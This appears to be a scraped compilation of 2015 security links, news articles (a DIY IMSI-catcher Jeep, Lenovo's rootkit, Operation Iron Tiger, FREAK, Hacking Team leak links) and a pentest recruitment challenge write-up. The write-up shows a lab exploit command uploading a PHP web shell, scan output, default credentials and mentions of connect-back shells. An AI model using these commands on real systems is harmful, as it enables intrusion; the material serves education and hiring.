Troy’s ultimate list of security links

http://www.troyhunt.com/2015/09/troys-ultimate-list-of-security-links.html

Saturday, 26 September 2015

I’ve got a heap of resources I constantly come back to in talks, workshops and just during the course of my everyday work. Frankly, I have trouble remembering them all myself plus I reckon they’re kinda useful for other people too so I thought I’d drop them all into a post here. If you’ve got good stuff I’ve missed (and you almost certainly will), drop it into the comments below as I’d love to add to my own set of resources plus that way it gets shared with everyone. Enjoy!

SSL / TLS / HTTPS

1. Is TLS fast yet – A great site debunking the myths of SSL/TLS speed cost
2. Firesheep – A watershed moment for SSL by demonstrating the ease with which unprotected traffic can be intercepted and sessions hijacked
3. Qualys SSL Labs – Tests a variety of attributes of the SSL implementation by pointing it at any URL
4. CloudFlare – Get SSL for free on any website
5. Let’s Encrypt – It’s coming, and it promises to fix the current mess that is CAs and configuring certs
6. Betsy’s free wifi – Shows a young girl standing up a rogue wifi hot spot
7. Chromium HSTS preload list – All the sites submitted for HTTP strict transport security preload (a depressingly small number of them)
8. HTTP Shaming – Sensitive data sent insecurely? Name and shame!

DDoS

1. Krista’s professional DDoS service – Video of an innocent teenager promoting a DDoS service
2. Norse – Totally awesome real time map of DDoS attacks that’s absolutely mesmerising to watch
3. Booter promotional video – Very professional advert for a “booter” service (complete with “Epic DDoS interface”)
4. networkstresser.com – Example of a DDoS service… protected by CloudFlare… the world’s largest provider of DDoS defences…

SQL injection

1. sqlmap – The tool for mounting SQL injection attacks tests against a running site
2. Drupal 7 SQL injection flaw of 2014 – great example of how impactful it still is (patch it within 7 hours or you’re owned)
3. Ethical Hacking: SQL Injection – If you really want to go deep, here’s five and a half hours worth of Pluralsight content

XSS

1. XSSposed – List of sites found to be vulnerable to XSS (including attack vector)
2. Dutch banks doing the Harlem Shake – Video collage of a number of Dutch banks with XSS risks being made to do the Harlem Shake via a script reflected from the URL
3. XSS Filter Evasion Cheat Sheet – Because XSS payload filtering is almost always insufficient
4. </xssed> – Heaps of XSS news and lists of vulnerabilities

Security scanners

1. NetSparker – My favourite dynamic analysis tool due to ease of use and practicality (especially good for developers who may not live in security land)
2. OWASP Zed Attack Proxy (ZAP) – Great tool for dynamic analysis security testing and ha a whole raft of other users too (oh – and it’s free!)
3. Burp Suite – Seriously powerful with a heap of different tools and a freebie version to get you started
4. Fiddler – Not a security tool per se, but I use it extensively to inspect website behaviour, tamper with requests and modify responses on the wire
5. Acunetix – Popular dynamic analysis tool similar to NetSparker but is let down a bit in the usability stakes IMHO
6. Nikto2 – Freebie open source app scanner sponsored by NetSparker

Exploit databases and breach coverage

1. seclists.org – Heaps of exploits consolidated from various bug tracking lists
2. Exploit Database – Very comprehensive list of vulnerabilities
3. PunkSPIDER – Lots of vulnerabilities of all kinds all over the web (about 90M sites scanned with over 3M vulns at present)
4. Data Loss DB – Good list of breaches including stats on number of records compromised
5. Information is Beautiful: World’s Biggest Data Breaches – Fantastic visualisation of incidents that give a great indication of scale

Cracking software

1. Hashcat – The tools for cracking hashed passwords; totally free with a great supportive community
2. John the Ripper – Also top notch password cracking software with some different approaches to Hashcat
3. RainbowCrack – Rainbow tables are becoming less relevant in the era of fast GPUs and tools like Hashcat, but it’s worth a mention anyway
4. Aircrack-ng – For all your 802.11 WEP and WPA-PSK key cracking needs

Hacking and penetration testing tools

1. Metasploit – The canonical pen testing tool; seriously advanced and enormously powerful
2. BeEF – The Browser Exploitation Framework offering remote control over a target’s browsing session
3. Kali Linux – All your pen testing bits in one image!
4. Backtrack-linux – Fallen out of favour a bit as Kali has emerged, but still deserves a mention
5. Nmap – For all your mapping of network things needs
6. Wireshark – When you need to down to monitoring at the packet level

Vulnerability definitions

1. The OWASP Top 10 Web Application Security Risks – The canonical categorisation of the top risks on the web today
2. SANS 20 Critical Security Controls – Great consolidation of security controls presented in an easily consumable fashion

Security headers

1. Fiddler extension for CSP – Massively streamlines your creation of a CSP by building the policy as you browse
2. SecurityHeaders.io – Everything security header related and a great place to assess your current state
3. Report URI – Analyse your CSP and HPKP headers plus log your exception reports there
4. Make any website do the Harlem Shake – if you can run this in the console against a website, they almost certainly don’t have a CSP prohibiting arbitrary content from being loaded into the site

Passwords

1. OWASP Password Storage Cheat Sheet – There are plenty of bad ways of doing it, this is a great resource documenting the good ways
2. Jimmy Kimmel “What is your password” – video of interviewing people and engineering them into disclosing their password
3. Diceware – A popular method of creating strong pass phrases suitable for use as a password

Password managers

1. 1Password – Still my favourite password manager; client based, runs on all devices and the keychain is syncable via multiple mechanisms
2. LastPass – A web based password manager (albeit with rich clients as well), one of the big players in password managers
3. KeePass – A popular free alternative to commercial password managers

Account management

1. Adult Friend Finder password reset – Enumeration done wrong; initiate a password reset for any email address and be told if they’re a member of a highly personal site
2. Entropay password reset – A great example of not disclosing the existence of an account (try resetting an account that isn’t registered on their system)
3. Botnet brute force attack against GitHub – I regularly use this as an example of how hard it can be to defend against brute force

Personal security

1. F-Secure’s Freedome – My VPN of choice with lots of exit nodes around the world and a promise of no logging
2. mycreditfile.com.au – This is an Aussie version so do find one local to you if you’re not down under, but identity protection and credit alerts is a “must have” today IMHO

Googledorks

1. Google Hacking Database – Great collection of Googledorks categorised by various classes of expose data
2. Google Hacking for Penetration Testers – In case you prefer books over web pages

Other tools and links

1. Have I been pwned? – How could I not include this?! My own tool, now being put to particularly good use by large enterprises monitoring tens of millions of people
2. Mailinator – create temporary email addresses for testing
3. Shodan – Find devices connected to the web (cameras, SCADA systems, etc.)
4. Reitre.js – “What you require you must also retire”: Helps identify JavaScript libraries with known vulnerabilities
5. urlQuery.net – Analyses web-delivered malware by inspecting an individual URL and identifying malicious behaviour
6. Phish5 – I’m yet to use them but I hear good things; phishing attacks are enormously effective and these guys help you test your organisation for how well equipped people are to recognise the attacks
7. Plain Text Offenders – Been emailed your password? Name and shame!
8. Kaspersky Real Time Threat Map – Very cool visualisation of the real time threat Kaspersky is seeing
9. Tor Browser Bundle – Access the underwebs and browse anonymously

Security statistics reports

1. Verizon Data Breach Investigations Report – The annual DBIR is based on real world security incidents and is a great resource for evidence-based security metrics
2. WhiteHat Security Statistics Report – Based on findings in the websites they monitor with their security products so another good evidence-based report
3. Trustwave Global Security Report – Another annual report driven from real world investigations (plus they use the terms “threat intelligence”, “seedy criminal underground” and “data defender” so you know it’ll be good!)
4. Websence Threat Report – Created by Websense Security Labs, a fairly high level overview of the threat landscape
5. HP Cyber Risk Report – More cyber, more statistics, more reports

Noteworthy books

1. We are Anonymous – Still one of my favourite security books, a look inside Lulzsec and how it all unravelled
2. Ghost in the Wires – The story of Kevin Mitnick’s early days and an absolutely fascinating read
3. Data and Goliath – Just because you’re paranoid doesn't mean they’re not after you! Excellent read on data collection by Bruce Schneier

Other things you should be reading

1. What Every Programmer Absolutely, Positively Needs To Know About Encodings And Character Sets To Work With Text – Because encoding is one of those things you just need to know

Awesome people you want to read and follow

1. Mikko Hypponen
2. Brian Krebs
3. Jeremiah Grossman
4. Scott Helme
5. Bruce Schneier
6. Kevin Mitnick
7. Swift on Security
8. Brian Honan
9. Graham Cluley
10. Rob Graham

What did I miss?

Lots. Leave your favourites in the comments, I’d love to see them!

The Very Unofficial Dummies Guide to Scapy

https://theitgeekchronicles.files.wordpress.com/2012/05/scapyguide1.pdf

Introduction to Python for Security Professionals

http://www.slideshare.net/j0b1n/introduction-to-python-for-security-professionals

Build Your Own Scary Surveillance Jeep For Under $5000 With This Hacker's Guide

http://www.forbes.com/sites/thomasbrewster/2015/09/15/diy-stingray-jeep/

If you could turn your car into a surveillance vehicle capable of intercepting telephone calls, jamming communications and manipulating electronic systems run by critical infrastructure providers, would you do it? What if it cost less than $5000?
This is possible thanks to cheap kit and open source software, says security consultant and pro hacker from Coalfire, Drew Porter. He’s kitted out his own 2008 Jeep Grand Cherokee Overland with nearly $5000 in radio, computing and power hardware so it can snoop on all kinds of information as he drives around. And Porter will teach others how to create their own covert spy car at the upcoming DerbyCon conference in Louisville, Kentucky later this month.
Porter has taken “war driving” – hacking on wheels – to the extreme to prove a point: as legal battles over NSA snooping and police use of phone-tracking Stingrays are waged, anyone can carry out similar surveillance with minimum effort and funding. “It started as a hidden project, mostly to hide it from my wife,” Porter joked. “It worked really well for three months. So it’s definitely spot on with the covertness.”
 
His own stealth mobile comes with two low-profile Ultra Wideband antennas collecting signals between the 700MHz-2700MHz bands of spectrum, and two more for capturing signals in the 125MHz-630MHz range. Along with the 7-inch HD monitor, a keyboard and mouse, they’re the only things that make the Jeep look a little different.
Everything else is hidden. Under the boot (pictured below) are two power converters to keep the operation running, a mini computer (Porter changes between an AMD BRIX and an Intel INTC +0.00% NUC) to handle all the data constantly coming in through the antennas, two power amplifiers and two low noise amplifiers to pick up weaker signals. There’s also the most expensive piece of kit, the USRP B210, a software-defined radio (SDR) that’s responsible to tuning into the various signals in the surrounding area. SDRs are remarkably useful for hackers of all ilks, as they can be quickly tinkered with to pick up on signals from different frequencies, whilst feeding the data back to linked software. They can be incredibly cheap, as $120. The USRP B210 cost Porter $1100. In total, he spent $4419 of his own money.

Recommended by Forbes

A host of computing, software defined radio and battery power kit, hidden in the back of Drew Porter’s stealth Jeep.

The Redz SIGINT software for on-the-move surveillance, or “war driving”, will be released later this month.

All of that hardware is managed by Porter’s bespoke software, dubbed Redz SIGINT (for signals intelligence). It allows him to view and interact with the surrounding spectrum at any time. It comes with various tools that form a veritable Swiss army knife for on-the-go hackers: a signals jammer to interrupt communications, analysis software for “unknown signals of interest” and a tool for replaying captured signals.
One of the “offensive” parts of Redz SIGINT is the IMSI capture tool. Such technology is built by a range of manufacturers, government contractor Harris HRS +0.00% Corp being the most famous, as it created the Stingray used by various police forces in the US. Stingrays essentially trick phones in a nearby area to connect to it. Combined with other software, they can be used to collect location data, phone information and the content of calls and texts. They’ve become a subject of controversy in recent years due to the FBI’s deployment of them without a warrant. A US Department of Justice announcement this month affirmed that warrants had to be obtained before a Stingray was put to use.
A 2008 price list obtained by Public Intelligence indicated Harris’ Stingray started at $75,000, though the additional software and antennas would have pushed the price up by tens of thousands of dollars. A Stingray 2 cost $148,000 on its own. But Porter was able to create a cheap and cheerful version of a Stingray by altering OpenBTS, an open source technology that is traditionally used to create cellular network access points.
“There was a whole bunch of news about Stingray. Everyone was like, it costs so many hundreds of thousands of dollars and … it’s very noticeable. I was like, I have a similar system that doesn’t cost hundreds of thousands of dollars that isn’t really noticeable,” he told FORBES. “Obviously police have different capabilities and they have greater capabilities … but this is generally what can be done with relatively cheap equipment.”
Porter was keen to point out he only used his personal Stingray, jammers and other “active” intelligence gathering tools in controlled environments with willing participants; only passive surveillance of open information was harvested in public environments.
What use might the spy Jeep be to more malicious war drivers? Outside of straight-up spying on people’s phones, they could look at disrupting critical infrastructure. Porter says he has regularly worked with companies managing America’s power. In one case, he found a firm responsible for running a water power plant used one signal to open and close water gates. He collected this signal, analysed it and discovered he could simply replay it to activate the gates. “That’s one example of using a software-defined radio that could be quite devastating for a critical infrastructure environment,” he added.
At DerbyCon, he will release the alpha version of Redz SIGINT and a PDF guide, “Build Your Own Covert SIGINT Vehicle”. Porter hopes his stealth Jeep will prove just how cheap and easy it is for anyone to surveil. “The hardware is cheap enough, the equipment is good enough to do real signals intelligence which can be scary. I’m sure there are a lot of people who don’t want civilians to go signals intelligence, but it is a fact of our life, where everything in our life has to be connected now and really this Jeep takes advantage of that.”
We could all be Big Brother if we wanted.

Operation Iron Tiger, hackers target US Defense Contractors

http://securityaffairs.co/wordpress/40199/cyber-crime/operation-iron-tiger.html

Experts at Trend Micro uncovered the Operation Iron Tiger, a cyber espionage campaign carried out by Chinese hackers on United States Defense Contractors.

Security experts at Trend Micro have uncovered a new targeted attack campaign dubbed Operation Iron Tiger. Threat actors behind the Operation Iron Tiger have stolen trillions of data from defense contractors in the US. Stolen data include intellectual property, including emails and strategic planning documents and many other highly confidential information that could be used by attackers to destabilize an organization.
The experts speculate that the Iron Tiger Operation was carried out by the China-based group dubbed “Emissary Panda.”

“Operation Iron Tiger is a targeted attack campaign discovered to have stolen trillions of data from defense contractors in the US, including stolen emails, intellectual property, strategic planning documents—data and records that could be used to destabilize an organization.” states a blog post published by Trend Micro.

In August 2015, researchers at Dell discovered that the Panda Emissary group used Watering hole attacks as the attack vector, they compromised websites popular with a target organization’s personnel.
The Panda Emissary (also known as TG-3390) targeted high-profile governments and organisations searching for defence aerospace projects.
The group is active at least since 2010 targeting organization in APAC, but since 2013 it is attacking high-technology targets in the US.
The experts consider the Panda Emissary a “highly competent and sophisticated group“, Trend Micro revealed to have seen them steal up to 58 GB worth of data from a single target.

“The Iron Tiger actors can be skilled computer security experts but sparingly used advanced techniques, given their weakly protected target networks. They do not follow a specific schedule when it came to launching attacks. Instead, they prioritize attacks based on a list of chosen targets.” states the experts.

The attackers used spear-phishing emails to carry on the attacks, the experts at Trend Micro analyzed in detail the accounts used by the hackers and the composition of the email messages (i.e. subject, language, message).
Trend Micro published a detailed report on the Operation Iron Tiger, the investigation allowed the experts to analyze the TTPs (Tactics, Techniques and Procedures  of the threat actor.
Below the key findings of the report:

• The group’s use of exclusive hacking tools and malware, such asdnstunserver, PlugX, Gh0st, to name a few
• The threat actor group’s use of public resources as Blogspot™ and the Google Cloud Platform™
• The group patched one of their compromised servers to avoid being hacked
• Key identification elements leading to at least one individual physically located in China
• The use of code-signing certificates of Korea-based security company SoftCamp Co., Ltd.
• The group’s list of targets, which include military defense contractors, intelligence agencies, FBI-based partners, and the US government
• Their use of a unique method to intercept  Microsoft Exchange credentials

Enjoy the full research paper entitled “Operation Iron Tiger: Exploring Chinese Cyber Espionage Attacks on US Defense Contractors.”
Pierluigi Paganini
(Security Affairs – Operation Iron Tiger, cyber espionage)

Share it please ...

Share this:

• Email
• Twitter129
• Print
• LinkedIn183
• Facebook124
• More
• 
  

Chinacyber espionageHackingOperation Iron TigerSecurity Affairs

Breaking News Cyber Crime Intelligence Malware

---

Share On

Pierluigi Paganini

Pierluigi Paganini is Chief Information Security Officer at Bit4Id, firm leader in identity management, member of the ENISA (European Union Agency for Network and Information Security)Treat Landscape Stakeholder Group, he is also a Security Evangelist, Security Analyst and Freelance Writer. Editor-in-Chief at "Cyber Defense Magazine", Pierluigi is a cyber security expert with over 20 years experience in the field, he is Certified Ethical Hacker at EC Council in London. The passion for writing and a strong belief that security is founded on sharing and awareness led Pierluigi to find the security blog "Security Affairs" recently named a Top National Security Resource for US. Pierluigi is a member of the "The Hacker News" team and he is a writer for some major publications in the field such as Cyber War Zone, ICTTF, Infosec Island, Infosec Institute, The Hacker News Magazine and for many other Security magazines. Author of the Books "The Deep Dark Web" and “Digital Virtual Currency and Bitcoin”.

Lenovo Caught Using Rootkit to Secretly Install Unremovable Software

http://thehackernews.com/2015/08/lenovo-rootkit-malware.html

Two years ago Chinese firm Lenovo got banned from supplying equipment for networks of the intelligence and defense services various countries due to hacking and spying concerns.

Earlier this year, Lenovo was caught red-handed for selling laptops pre-installed with Superfish malware.

One of the most popular Chinese computer manufacturers ‘Lenovo’ has been caught once again using a hidden Windows feature to preinstall unwanted and unremovable rootkit software on certain Lenovo laptop and desktop systems it sells.

 

The feature is known as "Lenovo Service Engine" (LSE) – a piece of code presents into the firmware on the computer's motherboard. 

If Windows is installed, the LSE automatically downloads and installs Lenovo's own software during boot time before the Microsoft operating system is launched, overwriting Windows operating system files.

More worrisome part of the feature is that it injects software that updates drivers, firmware, and other pre-installed apps onto Windows machine – even if you wiped the system clean.

So even if you uninstall or delete the Lenovo's own software programs, the LSE hidden in the firmware will automatically bring them back as soon as you power-on or reboot your machine.

Users at a number of online forums are criticizing Lenovo for this move and suspecting that the Chinese computer maker has installed a "bootkit" that survives a full system wipe-and-reinstall.

The issue was first discovered and reported by users back in May when using new Lenovo laptops but was widely reported Tuesday.

What these Unwanted Program Does?

For Desktops:

In case of desktops, Lenovo's own description states that the software doesn't send any personally identifying information, but sends some basic information, including the system model, date, region, and system ID, to a Lenovo server. 

Moreover, the company claims that this process is done only one-time, sending the information to its server only when a machine first connects to the Internet.

For Laptops:

However, in case of Laptops, the software does rather more. LSE installs a software program called OneKey Optimizer (OKO) that bundles on many Lenovo laptops. 

According to the company, the OKO software is used for enhancing computer performance by "updating the firmware, drivers, and pre-installed apps" as well as "scanning junk files and find factors that influence system performance."

OneKey Optimizer falls under the category of "crapware". The worst part is that both LSE as well as OKO appears to be insecure. 

Back in April, security researcher Roel Schouwenberg reported some security issues, including buffer overflows and insecure network connections, to Lenovo and Microsoft.

This forced Lenovo to stop including LSE on its new systems that built since June. The company has also provided firmware updates for vulnerable laptops and issued instructions to disable the option on affected machines and clean up the LSE files.

Among others, many Flex and Yoga machines running an operating system including Windows 7, Windows 8, and Windows 8.1 are affected by this issue. You can see the full list of affected notebooks and desktops on Lenovo's website.

Lenovo has since released an official statement, which notes that the systems made from June onwards have BIOS firmware that eliminates the issue, and it's no longer installing Lenovo Service Engine on PCs. 

Expert way! How to Remove Lenovo Service Engine (Rootkit)

In order to remove LSE from your affected machines, you have to do it manually. Follow these simple steps in order to do so:

1. Know your System Type (whether it’s a 32-bit or 64-bit version of Windows)
2. Browse to the Lenovo Security Advisory, and select the link for your specific Lenovo machine.
3. Click the "Date" button for the most recent update.
4. Search for "Lenovo LSE Windows Disabler Tool" and Click the download icon next to the version that matches your version of Windows.
5. Open the program once it downloads. It will remove the LSE software.

Bokken Open Source Reverse Code Engineering

http://bokken.re/index.html

Reverse tools, penting juga untuk security

Announcing the Second FLARE On Challenge

https://www.fireeye.com/blog/threat-research/2015/07/announcing_the_secon.html

The FireEye Labs Advanced Reverse Engineering (FLARE) team is hosting its second annual CTF-style challenge for all reverse engineers, malware analysts, and security professionals.

The first FLARE On Challenge was a huge success with over 7,000 participants and 226 winners! If you missed it last year, we invite you to compete and test your skills again. The challenge runs the gamut of skills we believe are necessary to succeed on the FLARE team. We invite everyone who is interested to solve the challenge and get their just reward!

 

The puzzles were developed by many different members of the FLARE team and lead by Nick Harbour. Nick is an expert in reverse engineering and computer forensics, with a specialty in anti-disassembly techniques. Nick has created industry security tools such as Red Curtain, dcfldd, IOCe, tcpxtract, and pe-scrambler. He also wrote Chapter 15 of Practical Malware Analysis.

The puzzles start with basic skills and escalate quickly to more difficult reversing tasks. At FLARE we have to deal with whatever challenges come our way, so the challenge reflects this. If you take on the challenge you might see puzzles involving Packers, Mobile platforms, steganography, obfuscated .NET, and so on.
 

The Second FLARE On Challenge will open at July 28, 2015 20:00EDT and close on Sept. 8, 2015 20:00EDT. You can finish any time before Sept. 8 to qualify for a prize.
 

Nick is hosting a webinar on Wednesday, July 29, to help kick off your challenge experience.

After completing the final challenge, you’ll be contacted by a FLARE team member. Once you provide a mailing address we’ll ship you your prize. Last year, the prize was a coin and this year we have something new and special for the winners ;). The full details can be found at: www.flare-on.com.
 

So on behalf of the FLARE team, I say Happy Reversing!

Hacking Team - Hacked Team

Artikel:
https://www.schneier.com/blog/archives/2015/07/hacking_team_is.html
http://www.csoonline.com/article/2943968/data-breach/hacking-team-hacked-attackers-claim-400gb-in-dumped-data.html
http://www.csoonline.com/article/2944732/data-breach/in-pictures-hacking-teams-hack-curated.html
http://www.csoonline.com/article/2944333/data-breach/hacking-team-responds-to-data-breach-issues-public-threats-and-denials.html
http://motherboard.vice.com/read/hacking-team-asks-customers-to-stop-using-its-software-after-hack
http://www.forbes.com/sites/thomasbrewster/2015/07/06/us-gov-likes-hacking-team/
http://www.defenseone.com/technology/2015/07/someone-just-leaked-price-list-cyberwar/117043/
http://leaksource.info/2015/07/07/hacking-team-hacked-400gb-data-dump-of-internal-documents-emails-source-code-from-notorious-spyware-dealer/


Anti Finfisher
http://leaksource.info/2014/08/06/gamma-finfisher-hack-40gb-of-internal-docs-source-code-from-top-govt-spyware-company-leaked/

Data:
http://hacking.technology/Hacked%20Team/
http://ht.transparencytoolkit.org/

Researchers hack NSA’s website with only $104 and 8 hours of Amazon’s cloud computing power using the #FREAK vulnerability

http://securityaffairs.co/wordpress/34554/hacking/nsa-site-vulnerable-freak-flaw.html

Researchers hack NSA’s website with only $104 and 8 hours of Amazon’s cloud computing power using the #FREAK vulnerability

A team of researchers demonstrated that it is possible to exploit the FREAK vulnerability to hack the official NSA website by using 8 hours of Amazon’s cloud computing power and spending only $104.
The researcher made a proof of concept for this attack only using a “few ingredients”; a collection of tools to run the MITM attack, the ability to (quickly) factor 512-bit RSA keys, a vulnerable client and server.

PoC was prepared by Karthik Bhargavan and Antoine Delignat-Lavaud at INRIA, the two researchers assembled an MITM proxy that can capture connections and modify them on fly to force the export-RSA against a vulnerable website.

“To factor the 512-bit export keys, the project enlisted the help of Nadia Heninger at U. Penn, who has been working on “Factoring as a Service” for exactly this purpose. Her platform uses cado-nfs on a cluster of EC2 virtual servers, and (with Nadia doing quite a bit of handholding to deal with crashes) was able to factor a bunch of 512-bit keys — each in about 7.5 hours for $104 in EC2 time.”

In reality, it is profoundly wrong to define a hack the exploitation of the FREAK flaw to run a MITM attack against the NSA website, the researchers haven’t compromised the server that is hosting the government site.

“Some will point out that an MITM attack on the NSA is not really an ‘MITM attack on the NSA’ because NSA outsources its web presence to the Akamai CDN (see obligatory XKCD at right). These people may be right, but they also lack poetry in their souls.” explained the crypto expert Matthew Green.

FREAK is major security SSL/TLS vulnerability recently discovered that for more than a decade left users of Apple and Google devices vulnerable to hacking when they visited millions of legitimate and secure websites. By exploiting the FREAK flaw an attacker can force clients to use older and weaker encryption, then he can crack the traffic protected with 512-bit key encryption in a few hours. Once decrypted the traffic a threat actor can steal sensitive information or launch an attack by injecting malicious code. According to a security advisory published by Microsoft all supported versions of Windows are affected by the recently discovered FREAK vulnerability
The list of websites vulnerable to the FREAK flaw includes sites belonging illustrious organizations and Intelligence agencies like the NSA.gov, FBI.gov and Whitehouse.gov.

“Based on some recent scans by Alex Halderman, Zakir Durumeric and David Adrian at University of Michigan, it seems that export-RSA is supported by as many as 5.2% 36.7% (!!!!) of the 14 million sites serving browser-trusted certs. The vast majority of these sites appear to be content distribution networks (CDN) like Akamai. Those CDNs are now in the process of removing export grade suites.” states Matthew Green.

A part of the security community considers the FREAK vulnerability an intentioned vulnerability introduced by governments in order to conduct surveillance activities.

FREAK is a “good example of what can go wrong when government asks to build weaknesses into security systems,” ​wrote Ed Felten, another respected professor of computer science at Princeton University.

Back in 1990s it was allowed a maximum key length of 512 bits for “export-grade” encryption, the situation changed in 2000 due to a modification of the US export laws. Starting from 2000 vendors were allowed to include 128-bit ciphers in the products that were distributed all over the world. The experts that found the FREAK vulnerability discovered that the “export-grade” cryptography support was never removed.

“In the current climate, it felt like the appropriate website to mount a man-in-the-middle attack on,” Said Bhargavan who is the member of the group that disclosed the bug.

Among other vulnerable websites, there is connect.facebook.net, which hosts the script for Facebook’s “Like” and login button that are included in several websites on the Internet.
At the time I’m writing, the NSA is vulnerable to the FREAK attack, despite the website doesn’t contain sensitive information experts speculate that it has a careers session. A threat actor exploiting the FREAK flaw could potentially steal the credentials of would-be NSAers and access their job applications, as reported by Motherboard website.

The Story of a Pentester Recruitment

http://blog.silentsignal.eu/2015/04/03/the-story-of-a-pentester-recruitment/

Intro

Last year we decided to expand our pentest team, and we figured that offering a hands-on challenge would be a good filter for possible candidates, since we’ve accumulated quite a bit of experience from organizing wargames and CTF at various events. We provided an isolated network with three hosts and anyone could apply by submitting a name, and email address and a CV – we’ve sent VPN configuration packs to literally everyone who did so. These packs included the following message (the original was in Hungarian).

Your task is to perform a comprehensive (!) security assessment of the hosts within range 10.10.82.100-254.

Typical tasks of a professional penetration tester include

• asking relevant clarifying questions about new projects,
• writing the technical part of business proposals,
• comprehensive penetration testing,
• report writing and presentation.

That is why we decided to test the candidates’ knowledge about the above subjects. The scope of the challenge consisted of 3 servers, report writing and presentation to the technical staff with a time limit of two weeks. Here is our solution:

Challenge 1

As a warm-up exercise we created a simple web hacking challenge. Web applications are the most common targets in real-life projects and their typical vulnerabilities are well known. We created our challenge in form of a modified WordPress installation: we killed some security features and added some new vulnerabilities either to the core or in the form of plug-ins.

The default page of the web server was an empty “Index of” page that lead some into thinking that there was nothing hosted on the server.  In reality the vulnerable application was located under the /wp/ path that could be easily discovered using most enumeration tools (like DirBuster).

It shouldn’t be long before one could stumble upon the first vulnerability: the search box right on the front page was vulnerable to reflective XSS:

This vulnerability was meant to be a gift to encourage contestants with a little feeling of success. Unfortunately, only one report contained this finding.
The blog also provided some means for authentication. First there was a password protected post, that could be opened using the infamous password “asdf1234″. The catch was that WordPress first hashes the password and places the hash in a cookie that is checked when rendering the post. This way standard login brute-forcers can’t be used but the problem can be solved in many ways. The crypt() method of WordPress can be reused to generate valid cookies or the application can be used as an oracle to generate the appropriate headers – the point was to get the applicant do some basic programming (or at least configuration) work.
The second authentication interface is of course the WordPress login interface (wp-login.php). The teszt:teszt credentials were valid on the system (we are a Hungarian company, “test” is spelled “teszt” in Hungarian). This can be brute-forced with standard tools – if the wordlist is customized for the target. We also provided test accounts for the participants. The given credentials only provided privileges to change basic user information. Although the application sent CSRF tokens with this form, they were not checked by the server.
More serious vulnerabilities could be found by enumerating installed WordPress plugins – wpscan output:

[+] We found 3 plugins:

[+] Name: akismet - v2.5.9
 | Location: http://10.10.82.153/wp/wp-content/plugins/akismet/
 | Readme: http://10.10.82.153/wp/wp-content/plugins/akismet/readme.txt

[+] Name: sexy-contact-form - v0.9.6
 | Location: http://10.10.82.153/wp/wp-content/plugins/sexy-contact-form/
 | Readme: http://10.10.82.153/wp/wp-content/plugins/sexy-contact-form/readme.txt

[!] Title: Creative Contact Form <= 0.9.7 Shell Upload
 Reference: https://wpvulndb.com/vulnerabilities/7652
 Reference: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8739
 Reference: http://www.exploit-db.com/exploits/35057/
[i] Fixed in: 1.0.0

[+] Name: simple-login-log - v1.1.0
 | Location: http://10.10.82.153/wp/wp-content/plugins/simple-login-log/
 | Readme: http://10.10.82.153/wp/wp-content/plugins/simple-login-log/readme.txt

First take a look at Simple Login Log that “tracks user name, time of login, IP address and browser user agent”. Doing some simple tests on the User-Agent header on login shows that (our version of) the plugin is vulnerable to blind SQL injection:

The Sexy Contact Form is an interesting beast: when we installed the site last August we threw in random plugins to make the application more “interesting”. One of these plugins was SCF that turned out to be vulnerable to remote code execution last October. We left the plugin enabled to see if anyone notices it. No one did, although even the published exploit works out-of-the-box:

$ python 35057.py -t http://10.10.82.153/wp/ -c wordpress -f shell.php
[...snip...]
[!] Shell Uploaded
[!] http://10.10.82.153/wp//wp-content/plugins/sexy-contact-form/includes/fileupload/files/shell.php

Although the web challenge may seem like the easiest one, we tried to insert some more subtle vulnerabilities that would require more thinking and manual work from the contestants. The challenge aimed to

• test if the contestant has a good overview on web application security and
• takes care of every detail of the target.

Sadly, most of them only used fully automated tools, which couldn’t even recognize the most basic XSS (or even find the app). Nobody was able to find the CSRF, the post password, the SQLi or the RCE.

Challenge 2

The second challenge was located at 10.10.82.242. A simple port scan shows that there are some Oracle services listening:

Starting Nmap 6.25 ( http://nmap.org ) at 2015-04-01 09:41 CEST
Nmap scan report for 10.10.82.242
Host is up (0.021s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
53/tcp open domain dnsmasq 2.45
111/tcp open rpcbind 2 (RPC #100000)
1521/tcp open oracle-tns Oracle TNS Listener 10.2.0.3.0 (for Linux)
30316/tcp open oracle-tns Oracle TNS listener

From here the task was rather simple. One could follow basically any Oracle hacking tutorial to gain access to the database. First we needed to find some valid SIDs:

Then we could use the default wordlist of Metasploit to find some valid accounts:

 As we can see, there were accounts registered with DBA role using default credentials. Even the good old scott:tiger combination was valid, and the database was vulnerable to multiple privilege escalation attacks. The time to DBA level access was comparable to the startup time of Metasploit – although it never hurts to have our tools properly configured, of course.
Since DBA level access was easy to achieve, OS level command execution could also be performed. An obvious way was to use Java stored procedures:

After one could overcome the limitations of Runtime.exec() (and SQL*Plus…) the system allowed opening connect-back shells without restriction. After a quick look around, the most elegant way to obtain root privileges was to use the beautiful $ORIGIN expansion exploit of Tavis Ormandy (yes, even GCC was installed):

The challenge presented a basic pentest task and required the candidates to follow basic tutorials (if they didn’t have enough Oracle-fu in their fingers, for example: http://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf). The most time consuming part was likely installing Oracle instant client and configuring Metaploit.
Only one participant was able to obtain DBA privileges, no one could execute OS level commands.

Challenge 3

The last target machine was located at 10.10.82.200. First of all the candidate should have done a port scan:

root@s2crew:~# nmap -sV -v -n -T4 -sC 10.10.82.200 Nmap scan report for 10.10.82.200 Host is up (0.036s latency). Not shown: 995 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp OpenVMS ftpd 5.1 23/tcp open telnet Pocket CMD telnetd 53/tcp open domain dnsmasq 2.45 | dns-nsid: |_ bind.version: dnsmasq-2.45 79/tcp open finger OpenVMS fingerd | finger: Username Program Login Term/Location |_SYSTEM $ Sun 02:21 110/tcp open pop3 |_pop3-capabilities: ERROR: Script execution failed (use -d to debug) MAC Address: 00:0C:29:3E:C1:FC (VMware) Service Info: Host: vms.silentsignal.hu; OS: OpenVMS; CPE: cpe:/o:hp:openvms

Oh, yes! This is an unbreakable OpenVMS operating system. I think there are only a couple of hackers out there who have remote exploits effective against this target. But a real hacker must solve the problems and discover the weak points of the tested systems, applications.
There is a finger service running on the host. Use Google to collect default OpenVMS accounts (http://cd.textfiles.com/group42/PHREAK/XENON/XENON7.HTM).
Having that, a simple shell script is enough to check the valid users:

